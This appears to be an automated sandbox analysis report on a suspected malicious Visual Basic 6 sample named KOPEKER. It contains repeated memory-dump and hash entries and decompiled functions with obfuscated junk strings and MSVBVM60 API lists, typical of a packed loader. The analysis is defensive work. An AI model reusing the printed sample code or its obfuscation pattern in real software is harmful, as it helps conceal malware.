          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID: O
          • API String ID: 0-878818188
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 41040a7ec9f3f66194590bf2c135abba1bc437404d8aa94c137d480354a4a16a
          • Instruction ID: 293858d6b0c94897cc2ab54b2a9ebf5acefcb07989cbdb98fb8bddb5d5d5a47c
          • Opcode Fuzzy Hash: 41040a7ec9f3f66194590bf2c135abba1bc437404d8aa94c137d480354a4a16a
          • Instruction Fuzzy Hash: 2711CE2A68CC77EDCB51652074523F7234B9F0A7A1F304019B8439B04AED8588C3BD3A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d7a2544709b31fdcd07574c3b9b81c8dac5428f07bdb215d900c9969394ad448
          • Instruction ID: e4e3f0cfec40fba66d55f613f1d402a42d39ab5f5274a729dd6372b15776f318
          • Opcode Fuzzy Hash: d7a2544709b31fdcd07574c3b9b81c8dac5428f07bdb215d900c9969394ad448
          • Instruction Fuzzy Hash: 6311892A68CC76ADC751656074527F7238B9B1A371F304019F8079B00AED8188C3BE39
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 81e8cdcfab6af62d4b3bffd4719574eba1f3b7adec94ec2a81eb4682b86c040e
          • Instruction ID: 3af12dcc144f0d347bbff23be5a4318a5a8a30d7a7f0a89081ebabb9208bf316
          • Opcode Fuzzy Hash: 81e8cdcfab6af62d4b3bffd4719574eba1f3b7adec94ec2a81eb4682b86c040e
          • Instruction Fuzzy Hash: 88016D2958CC76ADC751656075517F7234B5B1A361F304019B8079B10ADD8188C7AE3D
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b4a5c69f5f15138ecbfeb275529769ff637a7767fb7a3132a93019852cff3a5c
          • Instruction ID: 5ed00d71e81b0fc6c3b2adf3ad36aa6691977f7b25be87c590597c6291f5891f
          • Opcode Fuzzy Hash: b4a5c69f5f15138ecbfeb275529769ff637a7767fb7a3132a93019852cff3a5c
          • Instruction Fuzzy Hash: C9017B2A2CDC73EEC751652075923B62747DB1A361F308019E8879B40ADC854887AE3C
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6a5bb2a4eb0dbd434302ab3c48e0867f324abce8c04678b1e12fa3948f4a24d0
          • Instruction ID: 577801196973aec3fa4812f609bb5bdb009b7dc58e86e7e9aaa830fce7f69725
          • Opcode Fuzzy Hash: 6a5bb2a4eb0dbd434302ab3c48e0867f324abce8c04678b1e12fa3948f4a24d0
          • Instruction Fuzzy Hash: E9014235649D32AEFB7920E864153E52647AF03360EB1001ECEC34244AA77905C35E5A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0bea8d4b3b44715a5ef230252fcba2da1d0d1f3cc1df1b38cd407c3bd6002153
          • Instruction ID: e9fdeffdb1036d6489c0fb637aadf726cdbeb96949be1a43a6bfdafcfc09135b
          • Opcode Fuzzy Hash: 0bea8d4b3b44715a5ef230252fcba2da1d0d1f3cc1df1b38cd407c3bd6002153
          • Instruction Fuzzy Hash: AF012635649D329EFB7524E875153E53647EF033A0EB1441ECDC34204AA77905C35E5B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 77cb96f353fd1e10eb8a51891ad22a7fa017c0bb4befa4ec9a250ffa1a31e7b8
          • Instruction ID: 6675f09937810e48f61a764bf6ebcfe022906a0bbe75b32210405828829e0dc4
          • Opcode Fuzzy Hash: 77cb96f353fd1e10eb8a51891ad22a7fa017c0bb4befa4ec9a250ffa1a31e7b8
          • Instruction Fuzzy Hash: 19012625649E329EFB3515E864153E53A07AF07320BB2405ECDC386006A33849C35EA6
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f87a9fa5e5188f05cf74b1ac40bf5291756f5f426ae76c12e6f162f8772ac92
          • Instruction ID: 63385e113c25c566af74e5ab52689dbf3641ddcc91b22068cc33a5251aa9cf82
          • Opcode Fuzzy Hash: 6f87a9fa5e5188f05cf74b1ac40bf5291756f5f426ae76c12e6f162f8772ac92
          • Instruction Fuzzy Hash: B9F0C02A2CCCB39CC752612035513F607479B17375F304019E883AA44EEC864887BD3D
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e62c7b4864c6815780742fa4be29103a2055caf5d430de236781047e99dbed87
          • Instruction ID: cafd0210cffb4c990145765f00819b9324f0495e8c2d3eca947247d390b76934
          • Opcode Fuzzy Hash: e62c7b4864c6815780742fa4be29103a2055caf5d430de236781047e99dbed87
          • Instruction Fuzzy Hash: C3F0592A2CDCB39CCB66612035513F516478B07375F304069A883AA44EEC86888B6D3D
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f818dc492a5afcc9659b587429fddb1fd0c0bcd26948cb492218abfefcd2847f
          • Instruction ID: c72758f93310eb9415c1877dd09ad9aad774dacde8e379e2c1e443f51cce0505
          • Opcode Fuzzy Hash: f818dc492a5afcc9659b587429fddb1fd0c0bcd26948cb492218abfefcd2847f
          • Instruction Fuzzy Hash: 34F05C2B1DD8B39CC752616035513F51A439717336F308069D4939A44EECC6888BAD3D
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b0f1bf31a21af89a67f2f94278d70454f423c603505315c058957774a9c3db4b
          • Instruction ID: 2f83a3f999aba14300e4614c70dd2ef3514b1dd5d033def0e5f900d829404465
          • Opcode Fuzzy Hash: b0f1bf31a21af89a67f2f94278d70454f423c603505315c058957774a9c3db4b
          • Instruction Fuzzy Hash: 7BF02B2A2CD8B39CC762512031513F516439B17776F308069D4979A14EEDC6888BAE3D
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b292f11b1c0ea9bc109569a195f3fa00bc4744bf1900089535ca6ba31a017ba1
          • Instruction ID: 72a486ea7d354ab387701b4b4a6a040e8e09d47a5bc6d2ba7a66bb2c978ad093
          • Opcode Fuzzy Hash: b292f11b1c0ea9bc109569a195f3fa00bc4744bf1900089535ca6ba31a017ba1
          • Instruction Fuzzy Hash: 2EF05E35304E109FD324CA08E7C4FA673A3AF55750F964469EA46CB2A5E331EC81DE16
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5ab3ebc256ac967514cafd81611fee360ba3def05a6d9a21550a5cfb65c88b5b
          • Instruction ID: 3cbf477bc3a0ea385c8db37673e458b0518ce45b03dcada08b228a867d8e5eef
          • Opcode Fuzzy Hash: 5ab3ebc256ac967514cafd81611fee360ba3def05a6d9a21550a5cfb65c88b5b
          • Instruction Fuzzy Hash: 1AC048BE391A909BEB15DB08D896A4073B1F700A84BA509A4E806DB751C32CEE4A9A01
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c560d56505fae8080a04d611253409539bbf5e015d0e2a2deed310fe7cc64b1e
          • Instruction ID: ec95fd3b8600ab171419c010bd51b28c0f4dd363d3b01f07b336da74759d773f
          • Opcode Fuzzy Hash: c560d56505fae8080a04d611253409539bbf5e015d0e2a2deed310fe7cc64b1e
          • Instruction Fuzzy Hash: 05C04C31655C50CFCEA9DE09D1E0A68B3F6BB04751BD144A5E00787A51C224E885D901
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 51%
          			E00415DD3(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				long long _v28;
          				void* _v32;
          				signed int _v36;
          				signed int _v40;
          				char _v44;
          				char _v60;
          				char _v76;
          				char _v92;
          				char _v108;
          				char* _v132;
          				char _v140;
          				intOrPtr _v148;
          				char _v156;
          				signed int _v160;
          				signed int _v164;
          				signed int _v168;
          				signed int _v172;
          				signed int _v180;
          				signed int _v184;
          				intOrPtr* _v188;
          				signed int _v192;
          				signed int _v196;
          				signed int _v200;
          				intOrPtr* _v204;
          				signed int _v208;
          				signed int _t120;
          				signed int _t131;
          				char* _t138;
          				char* _t139;
          				signed int _t143;
          				char* _t147;
          				signed int _t150;
          				signed int _t156;
          				signed int _t161;
          				signed int* _t165;
          				intOrPtr _t182;
          				long long* _t183;
          				long long _t196;
          
          				_t196 = __fp0;
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t182;
          				L004016F0();
          				_v12 = _t182;
          				_v8 = 0x401598;
          				_v132 = L"8-8-8";
          				_v140 = 8;
          				_t165 =  &_v60;
          				L004018A0();
          				_push( &_v60);
          				_push( &_v76);
          				L004017E6();
          				_v148 = 8;
          				_v156 = 0x8002;
          				_push( &_v76);
          				_t120 =  &_v156;
          				_push(_t120);
          				L00401828();
          				_v160 = _t120;
          				_push( &_v76);
          				_push( &_v60);
          				_push(2);
          				L00401942();
          				_t183 = _t182 + 0xc;
          				if(_v160 != 0) {
          					if( *0x4183d8 != 0) {
          						_v188 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v188 = 0x4183d8;
          					}
          					_v160 =  *_v188;
          					_t156 =  *((intOrPtr*)( *_v160 + 0x4c))(_v160,  &_v40);
          					asm("fclex");
          					_v164 = _t156;
          					if(_v164 >= 0) {
          						_v192 = _v192 & 0x00000000;
          					} else {
          						_push(0x4c);
          						_push(0x411ad0);
          						_push(_v160);
          						_push(_v164);
          						L00401906();
          						_v192 = _t156;
          					}
          					_v168 = _v40;
          					_t161 =  *((intOrPtr*)( *_v168 + 0x24))(_v168, L"samtaleemnetsrhes", L"rebslagerierneshand",  &_v36);
          					asm("fclex");
          					_v172 = _t161;
          					if(_v172 >= 0) {
          						_v196 = _v196 & 0x00000000;
          					} else {
          						_push(0x24);
          						_push(0x411dac);
          						_push(_v168);
          						_push(_v172);
          						L00401906();
          						_v196 = _t161;
          					}
          					_v180 = _v36;
          					_v36 = _v36 & 0x00000000;
          					L00401882();
          					_t165 =  &_v40;
          					L004018AC();
          				}
          				_push( &_v60);
          				L004017DA();
          				_push( &_v60);
          				asm("fld1");
          				_push(_t165);
          				_push(_t165);
          				 *_t183 = _t196;
          				_push(0x411dc0);
          				_push( &_v76);
          				L004017E0();
          				_push( &_v92);
          				L004017DA();
          				_v132 = 1;
          				_v140 = 2;
          				_push( &_v76);
          				_push( &_v92);
          				_push( &_v140);
          				_t131 =  &_v108;
          				_push(_t131);
          				L004018E2();
          				_push(_t131);
          				L00401828();
          				_v160 = _t131;
          				_push( &_v108);
          				_push( &_v76);
          				_push( &_v92);
          				_push( &_v60);
          				_push(4);
          				L00401942();
          				if(_v160 != 0) {
          					_t143 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v40);
          					asm("fclex");
          					_v160 = _t143;
          					if(_v160 >= 0) {
          						_v200 = _v200 & 0x00000000;
          					} else {
          						_push(0x160);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v160);
          						L00401906();
          						_v200 = _t143;
          					}
          					if( *0x4183d8 != 0) {
          						_v204 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v204 = 0x4183d8;
          					}
          					_v164 =  *_v204;
          					_v184 = _v40;
          					_v40 = _v40 & 0x00000000;
          					_t147 =  &_v44;
          					L00401888();
          					_t150 =  *((intOrPtr*)( *_v164 + 0x40))(_v164, _t147, _t147, _v184, L"UNSERIALIZABLE");
          					asm("fclex");
          					_v168 = _t150;
          					if(_v168 >= 0) {
          						_v208 = _v208 & 0x00000000;
          					} else {
          						_push(0x40);
          						_push(0x411ad0);
          						_push(_v164);
          						_push(_v168);
          						L00401906();
          						_v208 = _t150;
          					}
          					L004018AC();
          				}
          				_push( &_v60);
          				L004017DA();
          				_t138 =  &_v60;
          				_push(_t138);
          				L004017D4();
          				_v160 =  ~(0 | _t138 != 0x0000ffff);
          				L00401912();
          				_t139 = _v160;
          				if(_t139 != 0) {
          					_v132 = L"EXOCRINOLOGY";
          					_v140 = 8;
          					L004018A0();
          					_push(2);
          					_t139 =  &_v60;
          					_push(_t139);
          					L004018A6();
          					_v28 = _t196;
          					L00401912();
          				}
          				asm("wait");
          				_push(0x4161bf);
          				L00401924();
          				return _t139;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415DF0
          • __vbaVarDup.MSVBVM60 ref: 00415E1C
          • #542.MSVBVM60(?,?), ref: 00415E29
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00415E4D
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00415E63
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00415E8D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C), ref: 00415EEF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F4F
          • __vbaStrMove.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F79
          • __vbaFreeObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F81
          • #610.MSVBVM60(?), ref: 00415F8A
          • #661.MSVBVM60(?,00411DC0,?,?,?,?), ref: 00415FA3
          • #610.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00415FAC
          • __vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00415FD5
          • __vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00415FDB
          • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00415FF9
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000160), ref: 00416046
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 0041606D
          • __vbaObjSet.MSVBVM60(?,?,UNSERIALIZABLE), ref: 004160B2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 004160ED
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 00416104
          • #610.MSVBVM60(?,00411DC0,?,?,?,?), ref: 0041610D
          • #557.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00416116
          • __vbaFreeVar.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00416130
          • __vbaVarDup.MSVBVM60(?,?), ref: 0041615A
          • #600.MSVBVM60(?,00000002), ref: 00416165
          • __vbaFreeVar.MSVBVM60(?,00000002), ref: 00416170
          • __vbaFreeStr.MSVBVM60(004161BF,?,?,00411DC0,?,?,?,?), ref: 004161B9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$#610$ListNew2$#542#557#600#661ChkstkMove
          • String ID: 8-8-8$UNSERIALIZABLE$rebslagerierneshand$samtaleemnetsrhes
          • API String ID: 1830445602-790280245
          • Opcode ID: 564fd277094097637ea71bec14d061d80f9c6640174a9b41bf714b12641776c3
          • Instruction ID: c541273776b1004c5d133e8dac987699c16e0419442bd701296478728087b1f2
          • Opcode Fuzzy Hash: 564fd277094097637ea71bec14d061d80f9c6640174a9b41bf714b12641776c3
          • Instruction Fuzzy Hash: 58A1C771D0021CAFDB10EBA1CC45BDEBBB8BF04704F5045AAE109B61A1DB799AC9CF59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 59%
          			E004167A5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				void* _v24;
          				void* _v40;
          				short _v44;
          				signed int _v48;
          				void* _v52;
          				intOrPtr _v60;
          				char _v68;
          				char _v84;
          				char* _v108;
          				intOrPtr _v116;
          				intOrPtr _v124;
          				char _v132;
          				void* _v136;
          				signed int _v140;
          				intOrPtr* _v144;
          				signed int _v148;
          				intOrPtr _v156;
          				intOrPtr* _v160;
          				signed int _v164;
          				signed int _v168;
          				signed int _t74;
          				short _t82;
          				signed int _t85;
          				signed int _t91;
          				signed int _t96;
          				intOrPtr _t121;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t121;
          				L004016F0();
          				_v12 = _t121;
          				_v8 = 0x401640;
          				_v60 = 0xe;
          				_v68 = 2;
          				_t74 =  &_v68;
          				_push(_t74);
          				L004017BC();
          				L00401882();
          				_push(_t74);
          				_push(L"Out of string space");
          				L0040184C();
          				asm("sbb eax, eax");
          				_v136 =  ~( ~( ~_t74));
          				L00401924();
          				L00401912();
          				if(_v136 != 0) {
          					_v108 = L"Statscheferstronhi8";
          					_v116 = 8;
          					L004018A0();
          					_push( &_v68);
          					_push( &_v84);
          					L004017B6();
          					L004018E8();
          					L00401912();
          				}
          				_v108 = L"8-8-8";
          				_v116 = 8;
          				L004018A0();
          				_push( &_v68);
          				_push( &_v84);
          				L004017E6();
          				_v124 = 8;
          				_v132 = 0x8002;
          				_push( &_v84);
          				_t82 =  &_v132;
          				_push(_t82);
          				L00401828();
          				_v136 = _t82;
          				_push( &_v84);
          				_push( &_v68);
          				_push(2);
          				L00401942();
          				_t85 = _v136;
          				if(_t85 != 0) {
          					if( *0x4183d8 != 0) {
          						_v160 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v160 = 0x4183d8;
          					}
          					_v136 =  *_v160;
          					_t91 =  *((intOrPtr*)( *_v136 + 0x4c))(_v136,  &_v52);
          					asm("fclex");
          					_v140 = _t91;
          					if(_v140 >= 0) {
          						_v164 = _v164 & 0x00000000;
          					} else {
          						_push(0x4c);
          						_push(0x411ad0);
          						_push(_v136);
          						_push(_v140);
          						L00401906();
          						_v164 = _t91;
          					}
          					_v144 = _v52;
          					_t96 =  *((intOrPtr*)( *_v144 + 0x24))(_v144, L"Dedications3", L"Lumskes6",  &_v48);
          					asm("fclex");
          					_v148 = _t96;
          					if(_v148 >= 0) {
          						_v168 = _v168 & 0x00000000;
          					} else {
          						_push(0x24);
          						_push(0x411dac);
          						_push(_v144);
          						_push(_v148);
          						L00401906();
          						_v168 = _t96;
          					}
          					_t85 = _v48;
          					_v156 = _t85;
          					_v48 = _v48 & 0x00000000;
          					L00401882();
          					L004018AC();
          				}
          				_v44 = 0x2a89;
          				_push(0x416a1d);
          				L00401924();
          				L00401912();
          				return _t85;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004167C2
          • #651.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004167E6
          • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004167F0
          • __vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 004167FB
          • __vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 00416812
          • __vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 0041681A
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041683E
          • #666.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041684B
          • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416856
          • __vbaFreeVar.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041685E
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416877
